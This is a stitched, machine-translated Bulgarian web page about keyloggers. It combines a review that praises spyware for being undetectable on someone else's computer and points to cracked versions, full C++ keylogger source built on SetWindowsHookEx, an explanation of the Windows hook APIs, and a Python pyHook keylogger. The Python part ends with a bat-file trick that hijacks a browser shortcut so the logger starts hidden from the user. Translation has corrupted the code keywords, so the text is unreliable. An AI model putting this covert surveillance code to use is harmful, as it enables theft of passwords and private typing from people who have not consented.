Лаборатория по сигурност на информацията.               Лаборатория за сигурност на информацията Колко време отне?

Различни шпионски програми са необходими в условия, когато много хора имат достъп до един компютър.

При тези условия потребителят може да иска да знае кои сайтове са били посетени от неговия компютър (например от деца), дали е станала кражба от кредитни картиизползване на запазени пароли и т.н., за да изясните тези проблеми, които ще ви трябват.

Нашият преглед ще ви позволи да направите най-добрия избор.

Характеристики на избор

Какво точно е keylogger? Това е програма, която, строго погледнато, не е пряко свързана с клавиатурата.

Инсталира се в паметта на компютъра и действа. Често признаците на неговата активност не се виждат на компютъра, освен ако не ги потърсите специално.

Такава програма взаимодейства индиректно с клавиатурата, т.е. работи с програма на компютъра, която преобразува сигналите, получени от процесора в резултат на натискане на бутони, в текст при печат.

Тоест действието на такъв софтуер е насочено към събиране на информация, въведена чрез клавиатурата.

Има такива помощни програми различни видове– с помощта на някои можете да видите целия текст, въведен от клавиатурата, с други – само въведеното в браузъра или в избрано приложение.

Някои програми предоставят възможност за конфигуриране на такива индикатори, други не.

Различават се един от друг и по степента на секретност. Например активността на някои е очевидна, пряк път остава на работния плот и т.н програмите са подходящи за наблюдение на дейностите например на деца.

Следите от присъствието и активността на други изобщо не се забелязват - те действат скрити и са подходящи за инсталиране на чужд компютър, когато фактът на инсталиране трябва да бъде скрит от потребител на трета страна.

Като се има предвид такова разнообразие, изборът на най-подходящия софтуер може да бъде доста труден.

Този материал представя ТОП най-добрите програми, които могат да се използват за тази цел. По-лесно е да изберете правилния сред тях.

Спецификации

За да се опрости процеса на подбор софтуерТаблицата по-долу показва основните сравнителни характеристики на всички програми, включени в ТОП.

Въз основа на характеристиките от тази таблица е лесно да изберете програмата, която най-добре отговаря на вашите специфични изисквания.

Тези помощни програми са описани по-подробно по-долу.

SC-KeyLog

Това е обемна и функционална шпионска програма, която се разпространява безплатно.

В допълнение към специфичното проследяване на информацията, въведена от клавиатурата, той също така може да събира адреси на посетени сайтове, пароли и отворени прозорци на браузъра.

Предоставя пълна информация за всички действия, извършени на компютъра. В този случай генерираният файл може да се гледа дистанционно от друго устройство.

• Възможност отдалечен достъпкъм файл от друго устройство;
• Няма следи от програмна активност на компютъра с правилните настройки;
• Разнообразие от събрани данни – има достъп до информация за почти всички действия на компютъра.

• Записва пароли само до NT0;
• Твърде опростено меню и неестетичен дизайн;
• Доста неудобен формат за показване на резултата.

Какво казват потребителите, които активно използват този софтуер? „Абсолютно невидим за потребителя“, „Данните пристигат редовно по имейл.“

WideStep Handy Keylogger

Това приложение се разпространява безплатно. Пълната платена версия струва $35.

Доста интересна и функционална програма, която си заслужава парите, ако сте готови да я платите.

Отличителна черта– възможност за изпращане на записани данни с определена честота. Иначе работи добре, често по-стабилно от другите програми в този списък.

• Събиране на различни видове информация;
• Пълна невидимост на работата на компютъра на потребителя;
• Опростен интерфейс и контроли.

• Дизайнът е по-добър от предишната програма, но все още не е страхотен;
• Форматът на показване на резултата е неудобен;
• Платената версия е доста скъпа.

Мненията на потребителите за този софтуер са следните: „Удобна, проста и функционална програма. Съвсем невидим по време на работа.“

Действителен шпионин

Това е функционална и сложна платена програма, която струва 600 рубли. Той обаче има демо версия, която е безплатна.

Функция на този софтуер– способност в даден период от време.

Това помага да се реши проблемът с въвеждането на графична парола/ключ, който напоследък стана широко разпространен.

• Много видове събрана информация плюс възможност за правене на екранни снимки от екрана през определен период от време;
• Голям брой други допълнителни функциии функции;
• Записва не само действията, но и времето, когато са извършени;
• Криптира генерирания дневник.

• Продължителността на работа (събиране на информация) в безплатната демо версия е 40 минути;
• Платено разпространение, макар и на повече или по-малко разумна цена;
• Теглото на програмата е доста голямо.

Потребителски отзиви за това приложениеса: „Програмата е отлична. Браво програмисти!“

EliteKeylogger

Платена програма с доста висока цена– 69 долара. Той работи напълно неоткриваемо на компютър в режим на ниско ниво, което го прави почти напълно неоткриваем.

Интересна и удобна функция– автоматично стартиране на софтуера, което се случва едновременно със стартирането на самата система.

Трудно се открива или изобщо не се открива дори от специални анти-кейлогъри.

• Напълно скрито действие и трудно за откриване;
• Операционен формат от ниско ниво на драйвер и автоматично стартиране при зареждане на системата;
• Той също така проследява натисканията не само на основните, но и на служебните клавиши на клавиатурата.

• Достатъчно сложна системаинсталиране на програмата на компютър;
• Програмата е скъпа, но можете да намерите стара хакната версия в руския интернет;
• Доста сложна система от индивидуални програмни настройки, която обаче се оправдава.

Какво казват потребителите за този софтуер? " Добра програма“, „Малко по-малко от Jetlogger.“

Плъхът!

Доста често срещана и популярна функционална помощна програма с платен лиценз.

За лична употреба обаче се предоставя безплатна демо версия за ограничен период от време.

Програмата е много проста– всеки напреднал потребител може да напише същото. Той обаче е напълно неоткриваем от антивируси и специални програми, откриване на такъв софтуер.

• Простота, функционалност и висока стабилност;
• Минимално тегло на файла и заеманото от него място на компютъра;
• Доста много настройки.

• Доста неприятен дизайн, направен в черно, бяло и червено;
• Функционалността е малко по-тясна, отколкото в описаните по-горе програми;
• Неудобно разглеждане на дневника и като цяло неудобен интерфейс и използване.

Потребителите казват следното за тази програма: „Работи стабилно, но е малко проста“, „Програмата е добра, позволява ви да събирате данни незабелязано“.

SPYGO

Това е фундаментално нов кийлогър, проектиран да работи и разработен от руски програмист.

Публикувано на 18 януари 2015 г. Къде?" Няма нужда да търсите лесни начини, особено в интернет :). Изтеглете keylogger безплатноможете, но бъдете готови за различни ограничения или изненади. Първо, функционалността на кийлогъра ще бъде ниска. Безплатни демонстрации пълноценни програмиобикновено съдържат ограничения, понякога неочаквани :). Второ, няма да има допълнителни, обикновено съпътстващи кийлогъри допълнителни програмиили функции за обработка на регистрационни файлове, настройки за проследяване и др. Трето, няма да намерите поддръжка на keylogger от производителите. Вместо да търси къде изтеглете keylogger безплатно, мислиш ли да го напишеш сам? най-простият кийлогър за WindowsНе е много трудно да пишете, ако имате основите на програмирането на Windows. И така, ние продължаваме да публикуваме източниците на keylogger. Keylogger за Windowsнаписан на C++, естествено използвайки Win API. Ключовата кука се реализира с помощта на SetWindowsHookEx(WH_KEYBOARD_LL,...). Създава се изпълним файл без dll библиотека, така да се каже, keylogger в един файл! Предимствата са очевидни - по-лесно е да се организира дистанционна инсталация, по-малък размер, по-голяма секретност (dll няма да виси в процесите на всички приложения). Недостатъкът на този метод за прихващане е, че е нестабилен или като цяло отказва да работи в Windows 7. Прихващането на ключове без използване на dll (WH_KEYBOARD_LL) причинява недоразумения между седемте. Трябва да използвате шаманизъм и магия, за да накарате кийлогъра да работи. Разбира се, винаги има изход (потърсете го сами и нека силата бъде с вас :)). Можете също да напишете нормален, като използвате SetWindowsHookEx (WH_KEYBOARD_LL ,...). Всичко ще бъде наред в Windows 7. Все още не е известно как WH_KEYBOARD_LL ще работи в Windows 8.

Регистрирането е организирано чрез файлов поток. Добавени са някои неща за подобряване на четливостта на журнала. Кодът е малък и ефективен. Става за keylogger за windows с определени добавки и въпроса е къде мога изтеглете keylogger безплатноизчезва.

Изходен файл *.exe:

#включи< windows.h >#включи< fstream >#включи< iostream >#включи< algorithm >#включи< string >използване на пространство от имена std; низ myKey; BOOL isCaps(); char logName = "keys.txt";//Име на LOG FILE //инициализиране на всички променливи за скорост MSG съобщение; HHOOK keyboardHook; char keyNameBuff; PKBDLLHOOKSTRUCT p; unsigned int sc; //keylogger за Windows void writeToLog(string s) //запис на низ в дневника ( ofstream log(logName, ios::app); //отваря лог файла log<< s; //writes to log.. with format "[""]" log.close(); //closes log } // Кейлоггер для Windows BOOL isCaps() { if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0 || ((GetKeyState(VK_SHIFT) & 0x8000)!=0)) { return 1; } else { return 0; } } // Кейлоггер для Windows LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)//proc to be run on hooked key { if (wParam == WM_KEYDOWN)//if key event type is key down { //get the keyname from lParam p = (PKBDLLHOOKSTRUCT) (lParam);//used to get the vkCode sc = MapVirtualKey(p->vkCode, 0); sc<<= 16; //shift 16 bits if (!(p->vkCode<= 32))//if not ascii { sc |= 0x1 << 24; // <- extended bit } GetKeyNameTextA(sc,keyNameBuff,16); // Кейлоггер для Windows - исходник //gets ASCII key name from sc into keyNameBuff //write keyname to log myKey = keyNameBuff; if (myKey == "Space") { writeToLog(" "); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } // if its none of the special keys else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } return CallNextHookEx(NULL, nCode, wParam, lParam); } // Кейлоггер для Windows void msgLoop() { while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Кейлоггер для Windows int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); //hooks keyboard msgLoop(); //stops from closing // Кейлоггер для Windows - исходник UnhookWindowsHookEx(keyboardHook); //unhooks return 0; //Never run }

Можете да използвате всяка среда за разработка, която желаете (Dev-C++, MSVS, Borland C++). Ние събираме, правим необходимите индивидуални промени икийлогър за Windowsготови и прекарайте време в търсене, където можетеИзтегли

Здравейте, жители на Хабровск.

Реших да напиша софтуерен клавиатурен регистратор на C++, използвайки WinAPI. Не мога да кажа, че преследвах някаква шпионска цел, когато го написах, по-скоро се запознавах с куките на WinAPI. Тъй като се оказа, че не е толкова зле и в Хабре няма статия за софтуерни регистратори, реших да напиша своя.

Как става това?

HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

За да прихванете всички натискания на клавиши на клавиатурата, е удобно да посочите WH_KEYBOARD или WH_KEYBOARD_LL като параметър idHook. Единствената разлика е, че WH_KEYBOARD_LL също прихваща натисканията на системни клавиши (т.е. Alt или който и да е клавиш, докато Alt е задържан), така че ще го изберем.

Lpfn е указател към функция, която обработва прихванати съобщения (в нашия случай натискания на клавиши).
hMod е манипулатор на екземпляр на приложение, съдържащ функция за обработка.
dwThreadId е идентификаторът на нишката, чиито съобщения искаме да прихванем. Този параметър трябва да бъде зададен на 0, за да прихваща съобщения от всички нишки.

Върнатата стойност е манипулатор на нашата кука, която ще трябва да бъде освободена с функцията UnhookWindowsHookEx при излизане.
Разглеждайки MSDN за помощ, виждаме прототип на функция, която обработва съобщения от тази кука.

LRESULT CALLACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

nCode трябва да е равен на HC_ACTION, в противен случай съобщението се дава на друг процес.
wParam е една от следните стойности: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN или WM_SYSKEYUP.
lParam е указател към структурата KBDLLHOOKSTRUCT, в полетата на която се интересуваме само от 2 параметъра: vkCode (виртуален код) и scanCode на натиснатия клавиш.
Тази функция трябва да върне стойността на функцията CallNextHookEx, в противен случай следващата кука, която обработва събитието, може да получи неправилни параметри на съобщението.
Всеки път, когато се натисне клавиш, нашата програма ще прихване това събитие и ще го обработи с нашата процедура LowLevelKeyboardProc.

За да преведем виртуалния и сканирания код на ключ в символна форма, се нуждаем от функцията ToAsciiEx.

Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

Първите 2 параметъра са съответно виртуалния и сканирания код на ключа.
lpKeyState — състояние на клавиатурата, проверява кои клавиши са натиснати/активни.
lpChar е указател към двойна дума, в която функцията ще запише символното представяне на ключа.
uFlags е параметър, показващ дейността на менюто.
dwhkl — идентификатор на клавиатурната подредба.
Върнатата стойност е броят знаци, записани в буфера lpChar. Интересуваме се от случая, когато е написан 1 знак.
По принцип това са 3-те основни функции, необходими за най-простия клавиатурен регистратор.

Малко за програмата

Здравейте, QUAZAR е отново тук. Днес ще ви покажа как да създадете прост кийлогър в Python. Разбира се, този кийлогър не може да се конкурира с такива гиганти като, но въпреки това може да намери своето приложение.

Какво е keylogger?

Можете да прочетете подробно какво е кийлогър и за видовете кийлогъри в статията „“. За да намерите допълнителни материали по темата, използвайте търсенето в сайта, което се намира в горния десен ъгъл. Просто въведете думата "keylogger" или "keylogger".

Прост кийлогър в Python

За да създадем keylogger, имаме нужда от:

• Операционна система: Windows или MacOs (може да се използва и всеки Linux, но не съм го пробвал лично)
• Python, инсталиран на целевата машина, както и специални библиотеки.

Този материал е само за информационни цели. Информацията, представена в тази статия, е предоставена само за информационни цели. Нито редакторите на уебсайта www.site, нито авторът на публикацията носят каквато и да е отговорност за вреди, причинени от материала в тази статия.

Създаване на прост keylogger в Python

Първо трябва да изтеглите и инсталирате Python.

След като инсталирате Python, трябва да инсталирате модулите "pyHook" и "pywin32". На този сайт ще намерите 32 и 64 битови версии за Windows и други операционни системи. Изтеглете „PYhook“ и „pyWin32“ според вашата инсталирана версия на Python и Windows (32-битова или 64-битова).

След като го изтеглите, инсталирайте и отворете IDLE (Python GUI) меню от менюто "Старт".

Отидете в менюто „Файл“ и щракнете върху елемента „Нов файл“. След това поставете кода на кийлогъра:

#Име: QUAZAR
#Уебсайт: www.сайт
импортиране на pyHook, pythoncom, sys, регистриране
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(събитие):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(събитие.Ascii)
logging.log(10,chr(event.Ascii))
върне True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

И го запазете, като извикате файла Keylogger.pyw. Просто не запазвайте файла в главната директория C: където имате нужда от администраторски права за копиране и изтриване на файлове. Създайте нова папка на вашия C: диск или някое друго място, където нямате нужда от администраторски права, за да копирате файлове и запишете Keylogger.pyw там.

Можете да изберете произволно местоположение като файл с изходен отчет „file_log = „C:keyloggerlog.txt“, но за предпочитане, разбира се, някое скрито място на вашия твърд диск. В този пример ще запазя файла с отчета на диск в основната директория C:. Все пак няма какво да крия.

Автоматично стартиране на кийлогър в Python

Keylogger е готов. Сега трябва да се уверим, че Keylogger стартира скрито от потребителя и автоматично при зареждане на Windows. Това може да се реализира по различни начини. Нека се опитаме да го направим с помощта на bat файл, като свържем стартирането на keylogger с някаква програма или като го регистрираме при стартиране.

Първо създайте bat файл. Копирайте и поставете следния код в Notepad:

::Име: QUAZAR
::Уебсайт: www.site
@echo изключено
стартирайте "" "C:keyloggerkeylogger.pyw"
стартирайте "" "C:Program FilesOperalauncher.exe"

В първия ред трябва да въведете пътя до файла keylogger.pyw (в моя случай „C:keylogger.pyw“). Във втория ред трябва да въведете пътя до програмата, която потребителят обикновено използва (в моя случай браузърът Opera).

След като редактирате, запишете файла с разширение .bat (в моя случай logger.bat) на някое скрито място на вашия компютър (в моя случай в „C:keylogger.bat“).

Сега отидете на работния плот и изберете пряк път за често използвана програма (в моя случай това е браузърът Opera). Щракнете с десния бутон на мишката, за да извикате контекстното меню и отидете до свойствата на прекия път. В полето „Обект“ въведете пътя до bat файла на keylogger „C:keyloggerlogger.bat“.

След като направите промени, иконата за бърз достъп също ще се промени. Но това може лесно да се реши в раздела със свойства (вижте екранната снимка по-горе).